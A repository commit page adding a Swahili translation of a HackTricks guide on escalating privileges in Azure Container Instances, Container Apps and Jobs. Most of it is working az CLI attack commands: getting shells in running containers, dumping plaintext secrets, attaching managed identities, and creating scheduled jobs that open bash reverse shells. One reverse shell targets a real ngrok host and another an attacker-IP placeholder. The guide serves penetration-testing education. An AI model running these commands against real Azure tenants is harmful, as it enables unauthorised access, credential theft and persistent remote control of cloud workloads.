gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-02-05 19:32:24 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-privilege-escalation

Browse Source
This commit is contained in:
Translator
2025-02-25 22:37:46 +00:00
parent f3453697ad
commit fb80867d2f
1 changed files with 177 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

177
src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md Normal file
View File

@@ -0,0 +1,177 @@
# Az - Azure Container Instances, Apps & Jobs Privesc
{{#include ../../../banners/hacktricks-training.md}}
## Azure Container Instances, Apps & Jobs
Kwa maelezo zaidi angalia:
{{#ref}}
../az-services/az-container-instances-apps-jobs.md
{{#endref}}
## ACI
### `Microsoft.ContainerInstance/containerGroups/read`, `Microsoft.ContainerInstance/containerGroups/containers/exec/action`
Hizi ruhusa zinamruhusu mtumiaji **kutekeleza amri** katika kontena linaloendesha. Hii inaweza kutumika **kuinua mamlaka** katika kontena ikiwa ina kitambulisho chochote kinachosimamiwa kilichounganishwa. Bila shaka, pia inawezekana kufikia msimbo wa chanzo na taarifa nyingine yoyote nyeti iliyohifadhiwa ndani ya kontena.
Ili kupata shell ni rahisi kama:
```bash
az container exec --name <container-name> --resource-group <res-group> --exec-command '/bin/sh'
```
Ni pia inawezekana **kusoma matokeo** ya kontena kwa:
```bash
az container attach --name <container-name> --resource-group <res-group>
```
Au pata rekodi za:
```bash
az container logs --name <container-name> --resource-group <res-group>
```
### `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
Hizi ruhusa zinaruhusu **kuunganisha utambulisho wa mtumiaji ulioendeshwa** kwa kundi la kontena. Hii ni muhimu sana kuongeza mamlaka katika kontena.
Ili kuunganisha utambulisho wa mtumiaji ulioendeshwa kwa kundi la kontena:
```bash
az rest \
--method PATCH \
--url "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ContainerInstance/containerGroups/<container-name>?api-version=2021-09-01" \
--body '{
"identity": {
"type": "UserAssigned",
"userAssignedIdentities": {
"/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-namaged-identity-name>": {}
}
}
}' \
--headers "Content-Type=application/json"
```
### `Microsoft.Resources/subscriptions/resourcegroups/read`, `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
Hizi ruhusa zinaruhusu **kuunda au kusasisha kundi la kontena** lenye **utambulisho wa mtumiaji ulioendeshwa** nalo. Hii ni muhimu sana katika kupandisha mamlaka ndani ya kontena.
```bash
az container create \
--resource-group <res-group> \
--name nginx2 \
--image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
--assign-identity "/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<user-namaged-identity-name>" \
--restart-policy OnFailure \
--os-type Linux \
--cpu 1 \
--memory 1.0
```
Moreover, ni muhimu pia kuboresha kundi la kontena lililopo kwa kuongeza kwa mfano **`--command-line` argument** na shell ya kurudi.
## ACA
### `Microsoft.App/containerApps/read`, `Microsoft.App/managedEnvironments/read`, `microsoft.app/containerapps/revisions/replicas`, `Microsoft.App/containerApps/revisions/read`, `Microsoft.App/containerApps/getAuthToken/action`
Hizi ruhusa zinamruhusu mtumiaji **kupata shell** katika kontena la programu linaloendesha. Hii inaweza kutumika **kuinua mamlaka** katika kontena ikiwa ina utambulisho wowote uliohifadhiwa. Bila shaka, pia inawezekana kufikia ms source code na taarifa nyingine yoyote nyeti iliyohifadhiwa ndani ya kontena.
```bash
az containerapp exec --name <app-name> --resource-group <res-group> --command "sh"
az containerapp debug --name <app-name> --resource-group <res-group>
```
### `Microsoft.App/containerApps/listSecrets/action`
Ruhusa hii inaruhusu kupata **maandishi wazi ya siri** zilizowekwa ndani ya programu ya kontena. Kumbuka kwamba siri zinaweza kuwekwa na maandiko wazi au kwa kiungo cha vault ya funguo (katika hali hiyo programu itakuwa na kitambulisho kinachosimamiwa kilichopewa ufikiaji juu ya siri).
```bash
az containerapp secret list --name <app-name> --resource-group <res-group>
az containerapp secret show --name <app-name> --resource-group <res-group> --secret-name <scret-name>
```
### `Microsoft.App/containerApps/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
Hizi ruhusa zinaruhusu **kuunganisha utambulisho wa mtumiaji ulioendeshwa** kwa programu ya kontena. Hii ni muhimu sana kuongeza mamlaka katika kontena. Kutekeleza hatua hii kutoka kwa az cli pia kunahitaji ruhusa `Microsoft.App/containerApps/listSecrets/action`.
Ili kuunganisha utambulisho wa mtumiaji ulioendeshwa kwa kundi la kontena:
```bash
az containerapp identity assign -n <app-name> -g <res-group> --user-assigned myUserIdentityName
```
### `Microsoft.App/containerApps/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.App/managedEnvironments/join/action`
Hizi ruhusa zinaruhusu **kuunda au kusasisha kontena la programu** lenye **utambulisho wa mtumiaji uliopewa usimamizi** ulioambatanishwa nalo. Hii ni muhimu sana katika kupandisha mamlaka ndani ya kontena.
```bash
# Get environments
az containerapp env list --resource-group Resource_Group_1
# Create app in a an environment
az containerapp create \
--name <app-name> \
--resource-group <res-group> \
--image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
--cpu 1 --memory 1.0 \
--user-assigned <user-asigned-identity-name> \
--min-replicas 1 \
--command "<reserse shell>"
```
> [!TIP]
> Kumbuka kwamba na ruhusa hizi **mipangilio mingine ya programu** inaweza kubadilishwa ambayo inaweza kuruhusu kufanya mashambulizi mengine ya privesc na post exploitation kulingana na mipangilio ya programu zilizopo.
## Jobs
### `Microsoft.App/jobs/read`, `Microsoft.App/jobs/write`
Ingawa kazi si za muda mrefu kama programu za kontena, unaweza kutumia uwezo wa kubadilisha mipangilio ya amri ya kazi wakati wa kuanzisha utekelezaji. Kwa kutengeneza kiolezo maalum cha kazi (kwa mfano, kubadilisha amri ya kawaida na shell ya kurudi), unaweza kupata ufikiaji wa shell ndani ya kontena linaloendesha kazi hiyo.
```bash
# Retrieve the current job configuration and save its template:
az containerapp job show --name <job-name> --resource-group <res-group> --output yaml > job-template.yaml
# Edit job-template.yaml to override the command with a reverse shell (or similar payload):
# For example, change the containers command to:
# - args:
# - -c
# - bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/18224 0>&1
# command:
# - /bin/bash
# image: mcr.microsoft.com/azureml/minimal-ubuntu22.04-py39-cpu-inference:latest
# Update and wait until the job is triggered (or change ths type to scheduled)
az containerapp job update --name deletemejob6 --resource-group Resource_Group_1 --yaml /tmp/changeme.yaml
# Start a new job execution with the modified template:
az containerapp job start --name <job-name> --resource-group <res-group> --yaml job-template.yaml
```
### `Microsoft.App/jobs/read`, `Microsoft.App/jobs/listSecrets/action`
Ikiwa una ruhusa hizi unaweza orodhesha siri zote (ruhusa ya kwanza) ndani ya kontena la Job na kisha kusoma thamani za siri zilizowekwa.
```bash
az containerapp job secret list --name <job-name> --resource-group <res-group>
az containerapp job secret show --name <job-name> --resource-group <res-group> --secret-name <secret-name>
```
### `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.App/jobs/write`
Ikiwa una ruhusa ya kubadilisha usanidi wa kazi, unaweza kuunganisha utambulisho wa usimamizi uliopewa mtumiaji. Utambulisho huu unaweza kuwa na ruhusa za ziada (kwa mfano, ufikiaji wa rasilimali nyingine au siri) ambazo zinaweza kutumika vibaya kuongeza ruhusa ndani ya kontena.
```bash
az containerapp job update \
--name <job-name> \
--resource-group <res-group> \
--assign-identity <user-assigned-identity-id>
```
### `Microsoft.App/managedEnvironments/read`, `Microsoft.App/jobs/write`, `Microsoft.App/managedEnvironments/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
Ikiwa unaweza kuunda Kazi mpya ya Container Apps (au kusasisha iliyopo) na kuambatisha kitambulisho kinachosimamiwa, unaweza kubuni kazi hiyo kutekeleza mzigo unaoongeza mamlaka. Kwa mfano, unaweza kuunda kazi mpya ambayo si tu inafanya kazi ya shell ya nyuma bali pia inatumia akidi za kitambulisho kinachosimamiwa kuomba tokeni au kufikia rasilimali nyingine.
```bash
az containerapp job create \
--name <new-job-name> \
--resource-group <res-group> \
--environment <environment-name> \
--image mcr.microsoft.com/oss/nginx/nginx:1.9.15-alpine \
--user-assigned <user-assigned-identity-id> \
--trigger-type Schedule \
--cron-expression "*/1 * * * *" \
--replica-timeout 1800 \
--replica-retry-limit 0 \
--command "bash -c 'bash -i >& /dev/tcp/<attacker-ip>/<port> 0>&1'"
```
> [!TIP]
> Amri hii itatoa kosa ikiwa huna ruhusa ya `Microsoft.App/jobs/read` ingawa Kazi itaundwa.
### `microsoft.app/jobs/start/action`, `microsoft.app/jobs/read`
Inaonekana kwamba kwa ruhusa hizi inapaswa kuwa inawezekana kuanzisha kazi. Hii inaweza kutumika kuanzisha kazi na shell ya kurudi au amri nyingine yoyote mbaya bila kuhitaji kubadilisha usanidi wa kazi.
Sijafanikiwa kuifanya ifanye kazi lakini kulingana na vigezo vilivyokubaliwa inapaswa kuwa inawezekana.
{{#include ../../../banners/hacktricks-training.md}}